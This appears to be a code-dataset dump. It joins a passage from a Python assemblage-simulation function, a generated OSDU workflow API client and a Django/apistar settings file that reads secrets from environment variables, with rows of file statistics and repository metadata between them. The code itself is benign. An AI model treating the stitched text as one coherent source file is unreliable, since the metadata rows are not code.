The results dict stores different data from the simulation:
1. raw_simulation - the numpy.array of the simulated assemblages
2. raw_observed - the formatted observed data as a numpy.array
3. distance_simulation - the distances from the center of the simulated distribtion
4. distance_observed - the distance of our actual assemblage from the center of the simulated distribution
5. p-value - the proportion of simulated assemblages further from the center than the observed assemblages
6. N - number of assemblages generated
7. p_dist - dimensionality of the distance used
8. center - which center definition used
"""
if center not in ['observed', 'calculated']:
raise ValueError("center neither 'observed' nor 'calculated")
#First, the observed data are formatted and used to construct the parameters for a weighted random distribution
observed_sites = np.asanyarray(context_counts) #convert from DataFrame or other structure to ndarray
observed = observed_sites[context_index]
num_objects = observed.sum() #objects in this context
num_types = observed_sites.shape[1] #number of different types of objects
marginal_types = observed_sites.sum(axis = 0)*1./observed_sites.sum().sum() #marginal distribution of the types of objects
#generate simulated assemblages
collector = np.zeros((N,num_types))
for i in range(N):
for o in range(num_objects):
y = rd.choices(range(num_types),weights = marginal_types)
collector[i,y] += 1
#Determine the center to be used for measuring all distances
if center == 'calculated':
center_calc = marginal_types*num_objects #calculate the theoretical center of the distribution
elif center == 'observed':
center_calc = collector.mean(axis = 0) #calculate the actual center of teh distribution
#calculate distances within the simulated distribution
dists_boot = scipy.spatial.distance_matrix(center_calc.reshape(1,-1), collector, p = p_dist).flatten()
dist_real = scipy.spatial.distance_matrix(center_calc.reshape(1,-1), observed.reshape(1,-1) , p = p_dist).flatten()[0]
#return results
result = {'raw_simulation' : collector,
'raw_observed' : observed,
'distance_simulation' : dists_boot,
'distance_observed' : dist_real,
'p-value' : sum(dists_boot>=dist_real)*1./len(dists_boot),
'N' : N,
'p_dist' : p_dist,
'center' : center}
return result | 49.914474 | 131 | 0.692105 | 986 | 7,587 | 5.21501 | 0.170385 | 0.013613 | 0.016336 | 0.011669 | 0.808635 | 0.805134 | 0.805134 | 0.756321 | 0.738234 | 0.720731 | 0 | 0.010309 | 0.232898 | 7,587 | 152 | 132 | 49.914474 | 0.873196 | 0.522473 | 0 | 0.523077 | 1 | 0 | 0.099375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0 | 0.061538 | 0 | 0.123077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9015408166de365722c4cdfd99b1934821ec1261 | 36,209 | py | Python | src/sdk/python/OsduClient/api/workflow_api.py | mstest123/self-managed-osdu_from_Daniel | 10a0c1d25804caa920bf18c6c7c1d8e711c63756 | [
"MIT"
] | 3 | 2021-11-05T20:52:54.000Z | 2021-11-23T23:02:29.000Z | src/sdk/python/OsduClient/api/workflow_api.py | mstest123/self-managed-osdu_from_Daniel | 10a0c1d25804caa920bf18c6c7c1d8e711c63756 | [
"MIT"
] | 4 | 2021-11-05T19:57:08.000Z | 2021-12-14T13:59:04.000Z | src/sdk/python/OsduClient/api/workflow_api.py | mstest123/self-managed-osdu_from_Daniel | 10a0c1d25804caa920bf18c6c7c1d8e711c63756 | [
"MIT"
] | 36 | 2021-08-31T20:58:25.000Z | 2022-03-30T17:02:57.000Z | # coding: utf-8
"""
self-managed-osdu
Rest API Documentation for Self Managed OSDU # noqa: E501
OpenAPI spec version: 0.11.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from OsduClient.api_client import ApiClient
class WorkflowApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_workflow(self, workflow_name, **kwargs): # noqa: E501
"""Delete a workflow defintion. # noqa: E501
Delete a workflow by it's name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_workflow(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to be deleted. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.delete_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def delete_workflow_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Delete a workflow defintion. # noqa: E501
Delete a workflow by it's name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_workflow_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to be deleted. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_workflow" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `delete_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deploy_workflow(self, **kwargs): # noqa: E501
"""Creates workflow definition with standard orchestrator operators. # noqa: E501
API to create a new workflow using standard operators of orchestrator. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deploy_workflow(async_req=True)
>>> result = thread.get()
:param async_req bool
:param Workflow body: Request payload for deploying new workflow.
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deploy_workflow_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.deploy_workflow_with_http_info(**kwargs) # noqa: E501
return data
def deploy_workflow_with_http_info(self, **kwargs): # noqa: E501
"""Creates workflow definition with standard orchestrator operators. # noqa: E501
API to create a new workflow using standard operators of orchestrator. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deploy_workflow_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param Workflow body: Request payload for deploying new workflow.
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deploy_workflow" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workflow', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_workflow_runs(self, workflow_name, **kwargs): # noqa: E501
"""Get all run instances of a workflow. # noqa: E501
Get all run instances for a worflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_workflow_runs(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow for which the execution details has to be fetched. (required)
:param str prefix: A prefix used when generating the runId of the workflow run. Prefix cannot contain the word \"backfill\"
:param str start_date: The start date where this call should start creating workflow runs from (inclusive)
:param bool end_date: The end date where this call should stop creating workflow runs at (inclusive)
:param int limit: The maximum number of workflow runs to create in a single request. Maximum is 500.
:param str cursor: Cursor for subsequent request.
:param bool partial: Whether or not a partial batch can be created. If true, and the number of workflow runs that would be created between the start and end exceeds the limit, no workflow runs will be created.
:param str conf: JSON configuration added to the Workflow run conf attribute
:return: list[WorkflowRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_workflow_runs_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.get_all_workflow_runs_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def get_all_workflow_runs_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Get all run instances of a workflow. # noqa: E501
Get all run instances for a worflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_workflow_runs_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow for which the execution details has to be fetched. (required)
:param str prefix: A prefix used when generating the runId of the workflow run. Prefix cannot contain the word \"backfill\"
:param str start_date: The start date where this call should start creating workflow runs from (inclusive)
:param bool end_date: The end date where this call should stop creating workflow runs at (inclusive)
:param int limit: The maximum number of workflow runs to create in a single request. Maximum is 500.
:param str cursor: Cursor for subsequent request.
:param bool partial: Whether or not a partial batch can be created. If true, and the number of workflow runs that would be created between the start and end exceeds the limit, no workflow runs will be created.
:param str conf: JSON configuration added to the Workflow run conf attribute
:return: list[WorkflowRun]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'prefix', 'start_date', 'end_date', 'limit', 'cursor', 'partial', 'conf'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_workflow_runs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `get_all_workflow_runs`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
if 'prefix' in params:
query_params.append(('prefix', params['prefix'])) # noqa: E501
if 'start_date' in params:
query_params.append(('startDate', params['start_date'])) # noqa: E501
if 'end_date' in params:
query_params.append(('endDate', params['end_date'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'cursor' in params:
query_params.append(('cursor', params['cursor'])) # noqa: E501
if 'partial' in params:
query_params.append(('partial', params['partial'])) # noqa: E501
if 'conf' in params:
query_params.append(('conf', params['conf'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WorkflowRun]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_workflow_run(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Get details for a speciffic workflow run instance. # noqa: E501
Get an execution instances for a workflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_run(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the worfkow. (required)
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
else:
(data) = self.get_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
return data
def get_workflow_run_with_http_info(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Get details for a speciffic workflow run instance. # noqa: E501
Get an execution instances for a workflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_run_with_http_info(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the worfkow. (required)
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'run_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_workflow_run" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `get_workflow_run`") # noqa: E501
# verify the required parameter 'run_id' is set
if self.api_client.client_side_validation and ('run_id' not in params or
params['run_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `run_id` when calling `get_workflow_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
if 'run_id' in params:
path_params['runId'] = params['run_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun/{runId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkflowRun', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_all_workflow(self, **kwargs): # noqa: E501
"""List all the workflow applicable for a tenant. # noqa: E501
List all the workflows for the tenant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_workflow(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str prefix: Filter workflow names which start with the full prefix specified.
:return: list[Workflow]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_all_workflow_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_all_workflow_with_http_info(**kwargs) # noqa: E501
return data
def list_all_workflow_with_http_info(self, **kwargs): # noqa: E501
"""List all the workflow applicable for a tenant. # noqa: E501
List all the workflows for the tenant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_workflow_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str prefix: Filter workflow names which start with the full prefix specified.
:return: list[Workflow]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['prefix'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_all_workflow" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'prefix' in params:
query_params.append(('prefix', params['prefix'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Workflow]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def trigger_workflow(self, workflow_name, **kwargs): # noqa: E501
"""Trigger a workflow. # noqa: E501
Trigger a workflow mentioned in payload. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.trigger_workflow(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to run. (required)
:param WorkflowTriggerRequest body:
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.trigger_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.trigger_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def trigger_workflow_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Trigger a workflow. # noqa: E501
Trigger a workflow mentioned in payload. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.trigger_workflow_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of the Workflow to run. (required)
:param WorkflowTriggerRequest body:
:return: WorkflowRun
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method trigger_workflow" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `trigger_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkflowRun', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_workflow_run(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Update the workflow run instance. # noqa: E501
Update workflow run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_workflow_run(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the worfkow. (required)
:param WorkflowRun body:
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
else:
(data) = self.update_workflow_run_with_http_info(workflow_name, run_id, **kwargs) # noqa: E501
return data
def update_workflow_run_with_http_info(self, workflow_name, run_id, **kwargs): # noqa: E501
"""Update the workflow run instance. # noqa: E501
Update workflow run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_workflow_run_with_http_info(workflow_name, run_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Unique Name of Workflow. (required)
:param str run_id: Run id for the worfkow. (required)
:param WorkflowRun body:
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name', 'run_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_workflow_run" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `update_workflow_run`") # noqa: E501
# verify the required parameter 'run_id' is set
if self.api_client.client_side_validation and ('run_id' not in params or
params['run_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `run_id` when calling `update_workflow_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
if 'run_id' in params:
path_params['runId'] = params['run_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun/{runId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workflow', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_workflow(self, workflow_name, **kwargs): # noqa: E501
"""Get complete details for a workflow. # noqa: E501
Get complete details for an workflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.view_workflow(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Name of the Workflow. (required)
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.view_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.view_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def view_workflow_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Get complete details for a workflow. # noqa: E501
Get complete details for an workflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.view_workflow_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Name of the Workflow. (required)
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_workflow" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `view_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workflow', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.349708 | 217 | 0.61667 | 4,257 | 36,209 | 5.010571 | 0.055908 | 0.052133 | 0.021003 | 0.027004 | 0.962166 | 0.954946 | 0.951617 | 0.945241 | 0.943366 | 0.942804 | 0 | 0.017305 | 0.296197 | 36,209 | 854 | 218 | 42.399297 | 0.819691 | 0.35505 | 0 | 0.793407 | 1 | 0 | 0.19058 | 0.04533 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037363 | false | 0 | 0.008791 | 0 | 0.101099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
903248d5b16acf84c9bf0e00f8ae51549690a3af | 2,125 | py | Python | config/settings.py | audiolion/Envelopes-api | f9e93521dc8cb5fd8169551192e1d98f6a359c7c | [
"MIT"
] | null | null | null | config/settings.py | audiolion/Envelopes-api | f9e93521dc8cb5fd8169551192e1d98f6a359c7c | [
"MIT"
] | 4 | 2019-10-18T15:54:05.000Z | 2021-06-01T22:07:16.000Z | config/settings.py | audiolion/Envelopes-API | f9e93521dc8cb5fd8169551192e1d98f6a359c7c | [
"MIT"
] | null | null | null | import os
from apistar_jwt.authentication import JWTAuthentication
settings = {
'AUTHENTICATION': [JWTAuthentication()],
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get('DB_NAME'),
'HOST': os.environ.get('DB_HOST'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
},
},
'INSTALLED_APPS': [
'django.contrib.auth',
'django.contrib.contenttypes',
'envelopes.apps.EnvelopesConfig',
'behaviors.apps.BehaviorsConfig',
'improved_user.apps.ImprovedUserConfig',
],
'AUTH_USER_MODEL': 'improved_user.User',
'AUTH_PREFIX': '',
'AUTH_PASSWORD_VALIDATORS': [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
'OPTIONS': {
'user_attributes': ('email', 'full_name', 'short_name')
},
},
# include other password validators here
],
'HASHIDS_SALT': os.environ.get('HASHIDS_SALT'),
'SECRET_KEY': os.environ.get('SECRET_KEY'),
'JWT': {
'SECRET': os.environ.get('JWT_SECRET'),
'ID': 'user',
},
}
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get('DB_NAME'),
'HOST': os.environ.get('DB_HOST'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
},
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'envelopes.apps.EnvelopesConfig',
'behaviors.apps.BehaviorsConfig',
'improved_user.apps.ImprovedUserConfig',
]
AUTH_USER_MODEL = 'improved_user.User'
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
'OPTIONS': {
'user_attributes': ('email', 'full_name', 'short_name')
},
},
]
HASHIDS_SALT = os.environ.get('HASHIDS_SALT')
SECRET_KEY = os.environ.get('SECRET_KEY')
JWT_SECRET = os.environ.get('JWT_SECRET')
